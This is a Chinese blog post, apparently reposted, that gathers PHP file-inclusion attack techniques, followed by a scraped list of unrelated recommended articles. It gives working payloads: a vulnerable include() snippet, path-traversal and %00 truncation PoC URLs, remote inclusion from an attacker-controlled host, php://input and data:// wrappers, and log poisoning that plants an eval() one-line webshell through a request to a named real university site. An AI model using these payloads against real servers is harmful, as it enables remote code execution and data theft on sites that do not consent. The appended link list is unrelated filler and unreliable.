有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络.

关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的...不过

大家都懒得测试,我就来整理下.

1.普通本地包含;

<?php 
$query=$_GET['p'];

include($query); 
?>

poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php

../hanguo/test.php为包含的路径.

只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。

2.截断本地包含 
require_once($a.'.php');

include($a.".php");

等等类似此包含的函数..

WINDOWS下还有特别用处:

\.或者./或者\或者/截断 (WINDOWS都可以使用.)

[link href="WooYun: 快乐购某分站文件包含漏洞"]波波虎[/link]

截断的原理

[link href="WooYun: 济南大学主站本地文件包含导致代码执行"]Linux包含截断例子[/link] (Linux.//可以.)

%00截断包含,有gpc=off和php版本限制

poc:http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00

3.远程包含

allow_url_include=On就是远程文件包含了,为off那就只能本地包含了.

测试case: 
<?php 
$query=$_GET['p'];

include($query.".php"); 
?>

连接:http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah.txt

爆错了:

Warning: main(http://www.axxer.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in

/var/www/htdocs/explame.php on line 3

include($query.".php");代码的缘故,在后面加上了".php",导致yeah.txt变成了yeah.txt.php.

这里我们不需要截断啦,来个360计之----将计就计.

在www.axxer.com创建个yeah.php文件;

然后http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah,自动在后面加

.php;多么爱。。。。

远程包含小连接

我们还可以用php自带协议来利用:

包含data:// 或者php://input 伪协议

这个漏洞对于php5.0以下有效,5.3测试失败,其他大家自行总结。还是比较鸡肋,不过不亏为一种好思路。

http://www.schnelltest24.de/index.php?page=/etc/passwd//这个没有截断,我们尝试下用协议看看.

利用协议然后POST发送利用代码,哈哈;多么有爱~~~~.

4.日记包含高级利用

[link href="WooYun: 济南大学主站本地文件包含导致代码执行"]Linux包含截断例子[/link]

此连接已经透露出技巧了呢,连接思路简单说下:

(1)访问带有一句话的错误连接(http://www.ujn.edu.cn/<%3fphp eval($_REQUEST[s]);%3f>xxxxxxxx...),此连接将记录到error.log错误记录文件中.

(2)找到包含漏洞的地方,包含到error.log文件的路径.然后在自定义s参数中输入我们恶意代码. (http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././..........)

一先限制以及突破: 
类似http://www.exp.com/index<?php eval($_POST[cmd]);?>.php 
这样的提交,某些WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php%20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志.

可以使用:伪造没有Connection HTTP标头的请求包

一点连接:内容1

内容2

5.其他高级利用

(1)包含/proc/self/environ环境变量: 
这个是利用Linux中的环境变量作为基础,很多时候这个方法行不通,因为没有/proc/self/environ的访问权限.同读取/etc/passwd一样

利用(文章中第四点有详细介绍了.)

(2) phpinfo临时文件爆破包含. //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(3)_SESSION爆破包含.   //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(2) (3)点介绍

phpinfo爆破包含pdf

转载于:https://www.cnblogs.com/h4ck0ne/p/5154550.html

php包含那点事情[WOOYUN]相关推荐

  1. wuyun 直接可以看的文章

    for someone: 不需要邀请码直接可以看的文章,截止今日,地址见下: http://zone.wooyun.org/content/29 遵循还是自创标准的困惑 http://zone.woo ...

  2. 如何实现后台向前台传数据

    技术交流群:233513714 这两天正在研究如何让后天主动向前台展现数据,只要后台有数据上传的时候就向前台上传(因为公司有个项目,硬件设备会不断的上传数据,服务端将接收到的数据向前台展示).在网上查 ...

  3. Dubbo的Provider配置

    现在我们按照他的一个架构图,注册中心已经配置好,现在只要把Provider搭建出来就可以,在Provider中需要告诉Provider的事情,第一件事情,我需要告诉它,我的注册中心在哪,这点你说应不应 ...

  4. 《Neural Networks for Machine Learning》学习一

    前言 最近报了一下Hinton大牛的coursera的神经网络课程,奈何比较懒,一直没看,还是写个博客督促自己比较好 贴一下课程地址:https://www.coursera.org/learn/ne ...

  5. Maven集成测试和Spring Restful Services

    介绍 我的原始博客通过一个非常简单的示例展示了如何分离Maven单元和集成测试. http://johndobie.blogspot.com/2011/06/seperating-maven-unit ...

  6. 【转载】会议是浪费工作时间的最佳去处

    会议是浪费工作时间的最佳去处 今天你开了多少个会?这个星期呢?这个月呢? 现在你再自问一下,那些会议中有多少是值得参加的?如果把相同的时间用在工作上,你又能完成多少事情? 这不禁让人想知道,我们究竟为 ...

  7. php的关系数据库,php – 从关系数据库到非关系数据库的数据规范化的最佳实践...

    我正在运行一个开始超越简单性能和Tunning的网站.这是一个PHP应用程序,MysqL作为后端.正确调整MysqL并优化代码. 问题是,我发现我可以使用某种非规范化来加快速度. 假设您有一个类似于e ...

  8. 编码的奥秘:从算盘到芯片

    转自: <编码的奥秘>   第十八章 纵观历史,人类发明了很多灵巧的工具和机器以满足广泛的需求,从而使数学运算变得更容易了些.虽然人类天生就有使用数字的能力,但仍能经常需要帮助.人们常遇到 ...

  9. 虚幻4渲染编程(材质编辑器篇)【第三卷:正式准备开始材质开发】

    My blog directory: YivanLee:专题概述及目录 Introduction: 前面两章我们已经完成了对工具的研究,下面我们久正式开始启程啦!后面的内容可能就比较美术了. 还是老规 ...

  10. GNU Bison 中文手册

    GNU Bison 中文手册 2005年06月22日 22:31:00 阅读数:41743 20050620 GNU Bison 中文手册翻译完成 GNU Bison实际上是使用最广泛的Yacc-li ...

最新文章

  1. JQuery 表单验证--jquery validation
  2. Android零碎知识点-更新中
  3. 优先队列(priority_queue)的原理及用法
  4. iphone退款申请教程_如何下载下架的APP?买错应用怎么退款?学会这几招iPhone更好用...
  5. ubuntu14.04安装 R16 Tina Linux SDK
  6. SpringBoot 自带工具类~CollectionUtils
  7. 基于Tensorflow的神经网络解决用户流失概率问题
  8. 西奥服务器修改楼层参数,西奥FOVF梯调试介绍.doc
  9. php 图片服务器搭建,php图像裁剪服务器搭建
  10. 某大型银行深化系统技术方案之十二:服务层之服务分类
  11. OpenCV2:幼儿园篇 第七章 界面事件
  12. ffmpeg不提供自己的编译结果了
  13. 《深入解析Windows操作系统第4版》随笔记录03
  14. hustoj 忘记admin密码的解决方案
  15. 回溯算法之迷宫问题(Maze)
  16. 概率论与数理统计(3)--指数分布函数及其期望、方差
  17. 百度地图汽车物流数智化应用方案,推进整车运输行业全链条数字化发展
  18. 用Rax开发一个联想搜索输入框,内附封装后的npm组件
  19. Usenix 2022 夏季论文简单分类
  20. 活码二维码分流规则使用说明

热门文章

  1. numpy 矩阵对角线_python – 使用numpy将矩阵更高的对角线清零
  2. 【C++】队列优先队列详解——deque.queue.priority_queue
  3. 怎样制作中阿拉伯文网页
  4. Microsoft visual studio关闭安全检查的几种方法
  5. [ROS Navigation Tuning Guide]翻译
  6. 网络爬虫学习笔记——网络爬虫简介
  7. 工业互联网体系架构、类型及应用
  8. mac 版本charles安装报错-Charles cannot configure your proxy settings while it is on a read-only volume.
  9. 2021年茶艺师(中级)考试内容及茶艺师(中级)操作证考试
  10. C++多线程-原子锁